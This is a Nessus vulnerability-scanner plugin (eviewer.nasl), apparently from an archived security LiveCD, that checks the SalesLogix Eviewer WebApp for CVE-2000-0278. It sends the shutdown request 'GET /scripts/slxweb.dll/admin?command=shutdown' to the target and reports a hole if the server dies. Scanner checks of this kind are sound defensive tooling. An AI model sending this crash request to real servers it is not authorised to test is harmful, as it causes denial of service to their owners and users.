home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / eviewer.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  91 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10361);
  10.  script_bugtraq_id(1089);
  11.  script_version ("$Revision: 1.22 $");
  12.  script_cve_id("CVE-2000-0278");
  13.  
  14.  name["english"] = "SalesLogix Eviewer WebApp crash";
  15.  name["francais"] = "DΘni de service SalesLogix Eviewer WebApp";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "It was possible to crash
  19. the remote server by requesting :
  20.  
  21.     GET /scripts/slxweb.dll/admin?command=shutdown
  22.     
  23. An attacker may use this flaw to crash this
  24. host, thus preventing your network from
  25. working properly.
  26.     
  27. Solution : Remove this CGI
  28.  
  29. Risk factor : High";
  30.  
  31.  desc["francais"] = "Il a ΘtΘ possible de tuer
  32. la machine distante en envoyant la requΩte :
  33.  
  34.     GET /scripts/slxweb.dll/admin?command=shutdown
  35.     
  36. Un pirate peut utiliser ce problΦme pour 
  37. faire planter cette machine, empechant 
  38. ainsi votre rΘseau de fonctionner 
  39. correctement.
  40.  
  41. Solution : enlevez ce CGI.
  42.  
  43. Facteur de risque : ElevΘ";
  44.  
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "Crashes Eviewer";
  49.  summary["francais"] = "Fait planter Eviewer";
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_KILL_HOST);
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  56.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  script_family(english:family["english"], francais:family["francais"]);
  60.  script_dependencies("find_service.nes", "no404.nasl");
  61.  script_require_ports("Services/www", 80);
  62.  exit(0);
  63. }
  64.  
  65. #
  66. # The script code starts here
  67. #
  68.  
  69. include("http_func.inc");
  70.  
  71. port = get_http_port(default:80);
  72.  
  73. if(get_port_state(port))
  74. {
  75.  if ( http_is_dead(port:port) ) exit(0);
  76.  req = http_get(item:"/scripts/slxweb.dll/admin?command=shutdown",
  77.              port:port);
  78.  soc = http_open_socket(port);
  79.  if(!soc)exit(0);
  80.  start_denial();
  81.  send(socket:soc, data:req);
  82.  r = http_recv(socket:soc);
  83.  http_close_socket(soc);
  84.  
  85.  alive = end_denial();
  86.  if(!alive && http_is_dead(port:port)){
  87.           security_hole(port);
  88.         set_kb_item(name:"Host/dead", value:TRUE);
  89.         }
  90. }
  91.